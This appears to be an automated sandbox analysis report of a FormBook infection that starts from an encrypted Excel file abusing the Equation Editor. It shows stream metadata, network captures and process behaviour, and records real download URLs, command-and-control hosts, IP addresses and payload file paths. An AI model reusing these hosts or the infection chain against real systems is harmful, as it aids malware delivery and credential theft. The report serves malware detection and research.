                              Entropy:2.73637206947
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                              General
                              Stream Path:\x6DataSpaces/DataSpaceMap
                              File Type:data
                              Stream Size:112
                              Entropy:2.7597816111
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                              General
                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                              File Type:data
                              Stream Size:200
                              Entropy:3.13335930328
                              Base64 Encoded:False
                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                              General
                              Stream Path:\x6DataSpaces/Version
                              File Type:data
                              Stream Size:76
                              Entropy:2.79079600998
                              Base64 Encoded:False
                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 2184664
                              General
                              Stream Path:EncryptedPackage
                              File Type:data
                              Stream Size:2184664
                              Entropy:7.99990143991
                              Base64 Encoded:True
                              Data ASCII:. U ! . . . . . x . M . . q . . . . . M . . . . . . R j ] X . e L . . . . . . W . n , . . o ] . @ . F ^ $ . . . . . . W . . . . . . . . p % * 9 . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . . ( 7 . p . . O { . . . . a . . .
                              Data Raw:cf 55 21 00 00 00 00 00 78 c3 4d e3 ca 71 c1 ec f6 8a f4 4d d1 e7 aa 8e a9 e6 52 6a 5d 58 d0 65 4c 99 97 01 ac 9f fc 57 a2 6e 2c 97 d2 6f 5d 0d 40 1d 46 5e 24 fb e2 99 ad f7 d9 57 b3 be a5 8b 05 e2 cb f9 70 25 2a 39 c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12 28 37 06 70 f7 f6 4f 7b c4 93 e5 17 61 c4 12 12
                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                               General
                               Stream Path: EncryptionInfo
                               File Type: data
                               Stream Size: 224
                               Entropy: 4.5381164508
                               Base64 Encoded: False
                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . ] D b . B o . p . ` . . . : q ) ^ t . . . . O . . . . r . . 4 . . . . . 1 . E . . . . 7 + . W . . . . . . . . . . . . . % . L % . . . .
                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Nov 20, 2020 11:27:50.286534071 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.506021976 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.506149054 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.506499052 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.727421999 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.727463961 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.727499008 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.727509975 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.727524996 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.727533102 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.727560997 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.727600098 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.947706938 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.947762012 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.947798967 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.947834015 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.947875977 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.947932959 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.947948933 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.947962046 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.947981119 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.948026896 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.948065042 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:50.948085070 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:50.948111057 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.167541981 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167603016 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167650938 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167692900 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167731047 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167779922 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167793989 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.167810917 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.167845964 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.167886019 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167927027 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.167954922 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.167990923 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168000937 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168039083 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168056965 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168091059 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168123007 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168160915 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168191910 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168224096 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168241978 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168287039 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168311119 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168344021 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168361902 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168401003 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.168418884 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.168453932 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.172945023 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.387686968 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.387763023 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.387820005 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.387849092 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.387872934 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.387880087 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.387929916 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.387973070 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.387989044 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388026953 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388044119 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388087988 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388098955 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388128042 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388164997 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388206005 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388221979 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388259888 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388278961 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388304949 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388345957 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388390064 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388415098 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388461113 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388483047 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388526917 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388550043 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388592958 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388617992 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388659954 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388684988 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388725996 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388753891 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388798952 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388819933 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388864040 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388887882 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388930082 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.388955116 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.388999939 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.389024973 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.389070988 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.389091969 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22
                               Nov 20, 2020 11:27:51.389136076 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.87
                               Nov 20, 2020 11:27:51.389159918 CET | 80 | 49167 | 103.141.138.87 | 192.168.2.22

                              UDP Packets

                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Nov 20, 2020 11:27:50.227308035 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                               Nov 20, 2020 11:27:50.271962881 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                               Nov 20, 2020 11:29:22.352675915 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                               Nov 20, 2020 11:29:22.402642012 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22

                              DNS Queries

                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                               Nov 20, 2020 11:27:50.227308035 CET | 192.168.2.22 | 8.8.8.8 | 0x746f | Standard query (0) | thdyneverwalkachinese2loneinlifekthfnp.ydns.eu | A (IP address) | IN (0x0001)
                               Nov 20, 2020 11:29:22.352675915 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.segredosdocopywriting.com | A (IP address) | IN (0x0001)

                              DNS Answers

                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                               Nov 20, 2020 11:27:50.271962881 CET | 8.8.8.8 | 192.168.2.22 | 0x746f | No error (0) | thdyneverwalkachinese2loneinlifekthfnp.ydns.eu | (none) | 103.141.138.87 | A (IP address) | IN (0x0001)
                               Nov 20, 2020 11:29:22.402642012 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.segredosdocopywriting.com | (none) | 172.67.181.41 | A (IP address) | IN (0x0001)
                               Nov 20, 2020 11:29:22.402642012 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.segredosdocopywriting.com | (none) | 104.24.99.174 | A (IP address) | IN (0x0001)
                               Nov 20, 2020 11:29:22.402642012 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.segredosdocopywriting.com | (none) | 104.24.98.174 | A (IP address) | IN (0x0001)

                              HTTP Request Dependency Graph

                              • thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
                              • www.segredosdocopywriting.com

                              HTTP Packets

                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               0 | 192.168.2.22 | 49167 | 103.141.138.87 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                               Timestamp | kBytes transferred | Direction | Data
                               Nov 20, 2020 11:27:50.506499052 CET | 0 | OUT | GET /chnsfrnd2/winlog.exe HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
                              Connection: Keep-Alive
                               Nov 20, 2020 11:27:50.727421999 CET | 2 | IN | HTTP/1.1 200 OK
                              Date: Fri, 20 Nov 2020 10:27:54 GMT
                              Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                              Last-Modified: Thu, 19 Nov 2020 20:54:09 GMT
                              ETag: "eb000-5b47bede9f95e"
                              Accept-Ranges: bytes
                              Content-Length: 962560
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                               1 | 192.168.2.22 | 49168 | 172.67.181.41 | 80 | C:\Windows\explorer.exe
                               Timestamp | kBytes transferred | Direction | Data
                               Nov 20, 2020 11:29:22.433763027 CET | 1014 | OUT | GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1
                              Host: www.segredosdocopywriting.com
                              Connection: close
                              Data Raw: 00 00 00 00 00 00 00
                              Data Ascii:
                               Nov 20, 2020 11:29:22.465790987 CET | 1015 | IN | HTTP/1.1 301 Moved Permanently
                              Date: Fri, 20 Nov 2020 10:29:22 GMT
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: max-age=3600
                              Expires: Fri, 20 Nov 2020 11:29:22 GMT
                              Location: https://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98
                              cf-request-id: 0686cca59a00007335491ca000000001
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Bf3j%2F1vQ%2Fjjmdm9TXlDCBJxYSVb4L5eqm54WB1%2Frab9jM5yqbhhBUV8xSjWCdkEizKcLUtPAfa3su3wCTHIj9Ot81X5eUax7HwwK1A0diXxwju%2BnK8yn1abAv1MRLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 5f517d4f5f567335-AMS
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Code Manipulations

                              User Modules

                              Hook Summary

                               Function Name | Hook Type | Active in Processes
                               PeekMessageA | INLINE | explorer.exe
                               PeekMessageW | INLINE | explorer.exe
                               GetMessageW | INLINE | explorer.exe
                               GetMessageA | INLINE | explorer.exe

                              Processes

                              Process: explorer.exe, Module: USER32.dll
                               Function Name | Hook Type | New Data
                               PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE5
                               PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE5
                               GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE5
                               GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE5

                              Statistics

                              Behavior


                              System Behavior

                              General

                               Start time: 11:26:58
                               Start date: 20/11/2020
                               Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                               Wow64 process (32bit): false
                               Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                               Imagebase: 0x13f780000
                               File size: 27641504 bytes
                               MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: high

                              General

                               Start time: 11:27:18
                               Start date: 20/11/2020
                               Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                               Wow64 process (32bit): true
                               Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                               Imagebase: 0x400000
                               File size: 543304 bytes
                               MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: high

                              General

                               Start time: 11:27:22
                               Start date: 20/11/2020
                               Path: C:\Users\Public\vbc.exe
                               Wow64 process (32bit): true
                               Commandline: 'C:\Users\Public\vbc.exe'
                               Imagebase: 0x30000
                               File size: 962560 bytes
                               MD5 hash: 221E46C09EB3440BEB5A2256211C3262
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: .Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 33%, ReversingLabs
                              Reputation:low

                              General

                               Start time: 11:27:54
                               Start date: 20/11/2020
                               Path: C:\Users\Public\vbc.exe
                               Wow64 process (32bit): false
                               Commandline: C:\Users\Public\vbc.exe
                               Imagebase: 0x30000
                               File size: 962560 bytes
                               MD5 hash: 221E46C09EB3440BEB5A2256211C3262
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: low

                              General

                               Start time: 11:27:55
                               Start date: 20/11/2020
                               Path: C:\Users\Public\vbc.exe
                               Wow64 process (32bit): false
                               Commandline: C:\Users\Public\vbc.exe
                               Imagebase: 0x30000
                               File size: 962560 bytes
                               MD5 hash: 221E46C09EB3440BEB5A2256211C3262
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: low

                              General

                               Start time: 11:27:55
                               Start date: 20/11/2020
                               Path: C:\Users\Public\vbc.exe
                               Wow64 process (32bit): true
                               Commandline: C:\Users\Public\vbc.exe
                               Imagebase: 0x30000
                               File size: 962560 bytes
                               MD5 hash: 221E46C09EB3440BEB5A2256211C3262
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:low

                              General

                               Start time: 11:27:57
                               Start date: 20/11/2020
                               Path: C:\Windows\explorer.exe
                               Wow64 process (32bit): false
                               Commandline: (none recorded)
                               Imagebase: 0xffca0000
                               File size: 3229696 bytes
                               MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: moderate

                              General

                               Start time: 11:28:07
                               Start date: 20/11/2020
                               Path: C:\Windows\SysWOW64\cmd.exe
                               Wow64 process (32bit): true
                               Commandline: C:\Windows\SysWOW64\cmd.exe
                               Imagebase: 0x4a550000
                               File size: 302592 bytes
                               MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
